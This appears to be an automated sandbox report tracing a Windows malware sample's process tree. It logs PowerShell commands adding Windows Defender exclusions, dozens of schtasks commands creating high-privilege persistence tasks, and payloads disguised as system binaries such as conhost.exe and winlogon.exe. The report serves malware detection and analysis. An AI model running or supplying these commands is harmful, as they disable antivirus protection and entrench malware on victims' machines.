        Suspicious use of AdjustPrivilegeToken
        
        PID:1576
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Desktop\conhost.exe'
        6⤵
        
        PID:4808
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\odt\upfc.exe'
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4176
      - C:\providercommon\DllCommonsvc.exe
        
        "C:\providercommon\DllCommonsvc.exe"
        6⤵
        Executes dropped EXE
        Checks computer location settings
        Drops file in Program Files directory
        Drops file in Windows directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4608
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\DllCommonsvc.exe'
        7⤵
        
        PID:1424
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\odt\powershell.exe'
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3224
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\SchCache\TrustedInstaller.exe'
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1896
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4808
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Mail\explorer.exe'
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3756
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\powershell.exe'
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4280
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\odt\smss.exe'
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3516
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Portable Devices\powershell.exe'
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4596
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\SoftwareDistribution\SLS\9482F4B4-E343-43B6-B170-9A65BC822C77\conhost.exe'
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1836
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Java\jre1.8.0_66\bin\server\conhost.exe'
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2528
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\de\services.exe'
        7⤵
        
        PID:1308
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Mail\SppExtComObj.exe'
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:388
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Multimedia Platform\fontdrvhost.exe'
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3228
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\odt\DllCommonsvc.exe'
        7⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1496
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\7-Zip\Lang\DllCommonsvc.exe'
        7⤵
        
        PID:4900
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\fontdrvhost.exe'
        7⤵
        
        PID:4212
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\1.3.165.21\powershell.exe'
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5412
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\conhost.exe'
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5504
        
        C:\Program Files (x86)\Windows Portable Devices\powershell.exe
        
        "C:\Program Files (x86)\Windows Portable Devices\powershell.exe"
        7⤵
        Executes dropped EXE
        Checks computer location settings
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        
        PID:5724
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Wqkq749RcZ.bat"
        8⤵
        
        PID:1876
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        9⤵
        
        PID:2004
        
        C:\Program Files (x86)\Windows Portable Devices\powershell.exe
        
        "C:\Program Files (x86)\Windows Portable Devices\powershell.exe"
        9⤵
        Executes dropped EXE
        Checks computer location settings
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        
        PID:452
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\16sHyqWYU0.bat"
        10⤵
        
        PID:3540
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        11⤵
        
        PID:396
        
        C:\Program Files (x86)\Windows Portable Devices\powershell.exe
        
        "C:\Program Files (x86)\Windows Portable Devices\powershell.exe"
        11⤵
        Executes dropped EXE
        Checks computer location settings
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        
        PID:1436
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\mTJ33xL03H.bat"
        12⤵
        
        PID:4856
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        13⤵
        
        PID:1396
        
        C:\Program Files (x86)\Windows Portable Devices\powershell.exe
        
        "C:\Program Files (x86)\Windows Portable Devices\powershell.exe"
        13⤵
        Executes dropped EXE
        Checks computer location settings
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        
        PID:3588
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Re4gxnF4du.bat"
        14⤵
        
        PID:2228
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        15⤵
        
        PID:3212
        
        C:\Program Files (x86)\Windows Portable Devices\powershell.exe
        
        "C:\Program Files (x86)\Windows Portable Devices\powershell.exe"
        15⤵
        Executes dropped EXE
        Checks computer location settings
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        
        PID:2880
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Jobc5AEC9X.bat"
        16⤵
        
        PID:1600
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        17⤵
        
        PID:1892
        
        C:\Program Files (x86)\Windows Portable Devices\powershell.exe
        
        "C:\Program Files (x86)\Windows Portable Devices\powershell.exe"
        17⤵
        Executes dropped EXE
        Checks computer location settings
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        
        PID:1312
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\79RMekxjZd.bat"
        18⤵
        
        PID:4928
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        19⤵
        
        PID:5124
        
        C:\Program Files (x86)\Windows Portable Devices\powershell.exe
        
        "C:\Program Files (x86)\Windows Portable Devices\powershell.exe"
        19⤵
        Executes dropped EXE
        Checks computer location settings
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        
        PID:5164
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\kOAwrWovpT.bat"
        20⤵
        
        PID:5200
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        21⤵
        
        PID:4164
        
        C:\Program Files (x86)\Windows Portable Devices\powershell.exe
        
        "C:\Program Files (x86)\Windows Portable Devices\powershell.exe"
        21⤵
        Executes dropped EXE
        Checks computer location settings
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        
        PID:5196
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\iS8tBRk2Vg.bat"
        22⤵
        
        PID:312
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        23⤵
        
        PID:3356
        
        C:\Program Files (x86)\Windows Portable Devices\powershell.exe
        
        "C:\Program Files (x86)\Windows Portable Devices\powershell.exe"
        23⤵
        Executes dropped EXE
        Checks computer location settings
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        
        PID:3440
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\GsZYO5BIqk.bat"
        24⤵
        
        PID:5556
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        25⤵
        
        PID:1896
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Mozilla Maintenance Service\logs\taskhostw.exe'
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5452
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\winlogon.exe'
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5372

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 14 /tr "'C:\providercommon\fontdrvhost.exe'" /f
1⤵
- Process spawned unexpected child process
PID:4176

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\providercommon\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4992

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 12 /tr "'C:\providercommon\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2100

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 6 /tr "'C:\Program Files\Windows Defender\it-IT\spoolsv.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3180

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Program Files\Windows Defender\it-IT\spoolsv.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:552

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Defender\it-IT\spoolsv.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3136

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\dwm.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4284

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\dwm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:3352

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\dwm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:220

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows Media Player\winlogon.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3964

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Program Files\Windows Media Player\winlogon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:724

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 6 /tr "'C:\Program Files\Windows Media Player\winlogon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4340

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /f
1⤵
- Process spawned unexpected child process
PID:1808

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:1036

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4540

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 7 /tr "'C:\odt\upfc.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3944

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "upfc" /sc ONLOGON /tr "'C:\odt\upfc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:876

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 10 /tr "'C:\odt\upfc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:2504

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 13 /tr "'C:\Users\Default\Desktop\conhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2172

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Users\Default\Desktop\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3760

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\Users\Default\Desktop\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4616

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\Users\All Users\SoftwareDistribution\conhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4712

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Users\All Users\SoftwareDistribution\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:1788

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 13 /tr "'C:\Users\All Users\SoftwareDistribution\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:836

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 14 /tr "'C:\odt\conhost.exe'" /f
1⤵
- Process spawned unexpected child process
PID:1684

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\odt\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2304

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 7 /tr "'C:\Windows\CbsTemp\smss.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3152

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 5 /tr "'C:\odt\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3756

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 14 /tr "'C:\Windows\CbsTemp\smss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2860

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 14 /tr "'C:\Windows\LiveKernelReports\powershell.exe'" /f
1⤵
- Process spawned unexpected child process
PID:436

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 9 /tr "'C:\Windows\LiveKernelReports\powershell.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:396

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\spoolsv.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2880

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\spoolsv.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1336

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\spoolsv.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1316

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "powershell" /sc ONLOGON /tr "'C:\Windows\LiveKernelReports\powershell.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1436

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Windows\CbsTemp\smss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4156

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 12 /tr "'C:\providercommon\fontdrvhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4308

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\providercommon\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1896

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 12 /tr "'C:\providercommon\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:996

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "DllCommonsvcD" /sc MINUTE /mo 8 /tr "'C:\Program Files\7-Zip\Lang\DllCommonsvc.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2060

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "DllCommonsvc" /sc ONLOGON /tr "'C:\Program Files\7-Zip\Lang\DllCommonsvc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:3700

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "DllCommonsvcD" /sc MINUTE /mo 10 /tr "'C:\Program Files\7-Zip\Lang\DllCommonsvc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Executes dropped EXE
- Drops file in Windows directory
- Creates scheduled task(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:840

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "DllCommonsvc" /sc ONLOGON /tr "'C:\odt\DllCommonsvc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3772

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "DllCommonsvcD" /sc MINUTE /mo 13 /tr "'C:\odt\DllCommonsvc.exe'" /f
1⤵
- Process spawned unexpected child process
PID:4312

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "DllCommonsvcD" /sc MINUTE /mo 14 /tr "'C:\odt\DllCommonsvc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4992

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Windows Multimedia Platform\fontdrvhost.exe'" /f
1⤵
- Process spawned unexpected child process
PID:836

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Multimedia Platform\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:808

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Windows Multimedia Platform\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4556

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Mail\SppExtComObj.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4720

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 12 /tr "'C:\odt\powershell.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1496

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "TrustedInstallerT" /sc MINUTE /mo 6 /tr "'C:\Windows\SchCache\TrustedInstaller.exe'" /f
1⤵
- Process spawned unexpected child process
PID:1088

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 8 /tr "'C:\Users\Default User\powershell.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1072

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 10 /tr "'C:\odt\smss.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3224

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 13 /tr "'C:\odt\smss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:2608

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 10 /tr "'C:\Windows\SoftwareDistribution\SLS\9482F4B4-E343-43B6-B170-9A65BC822C77\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3592

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Windows Portable Devices\powershell.exe'" /f
1⤵
- Process spawned unexpected child process
PID:2312

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\1.3.165.21\powershell.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4424

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\1.3.165.21\powershell.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:4232

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Mozilla Maintenance Service\logs\taskhostw.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2844

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 11 /tr "'C:\providercommon\conhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1992

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 14 /tr "'C:\providercommon\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4104

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\providercommon\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3048

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostw" /sc ONLOGON /tr "'C:\Program Files (x86)\Mozilla Maintenance Service\logs\taskhostw.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1972

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Mozilla Maintenance Service\logs\taskhostw.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4516

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "powershell" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\1.3.165.21\powershell.exe'" /rl HIGHEST /f
1⤵
PID:4576

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 14 /tr "'C:\providercommon\winlogon.exe'" /rl HIGHEST /f
1⤵
- Creates scheduled task(s)
PID:2464

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\providercommon\winlogon.exe'" /rl HIGHEST /f
1⤵
- Creates scheduled task(s)
PID:4476

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 10 /tr "'C:\providercommon\winlogon.exe'" /f
1⤵
- Creates scheduled task(s)
PID:1524

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Windows Portable Devices\powershell.exe'" /rl HIGHEST /f
1⤵
PID:1824

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "powershell" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Portable Devices\powershell.exe'" /rl HIGHEST /f
1⤵
PID:3264

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Windows\SoftwareDistribution\SLS\9482F4B4-E343-43B6-B170-9A65BC822C77\conhost.exe'" /rl HIGHEST /f
1⤵
- Creates scheduled task(s)
PID:3460

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\Windows\SoftwareDistribution\SLS\9482F4B4-E343-43B6-B170-9A65BC822C77\conhost.exe'" /f
1⤵
- Creates scheduled task(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5004

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\odt\smss.exe'" /rl HIGHEST /f
1⤵
- Creates scheduled task(s)
PID:5040

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 12 /tr "'C:\Users\Default User\powershell.exe'" /rl HIGHEST /f
1⤵
- Creates scheduled task(s)
PID:4440

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "powershell" /sc ONLOGON /tr "'C:\Users\Default User\powershell.exe'" /rl HIGHEST /f
1⤵
- Creates scheduled task(s)
PID:3992

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "TrustedInstallerT" /sc MINUTE /mo 5 /tr "'C:\Windows\SchCache\TrustedInstaller.exe'" /rl HIGHEST /f
1⤵
PID:3772

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "TrustedInstaller" /sc ONLOGON /tr "'C:\Windows\SchCache\TrustedInstaller.exe'" /rl HIGHEST /f
1⤵
- Creates scheduled task(s)
PID:2652

C:\Windows\system32\schtasks.exe
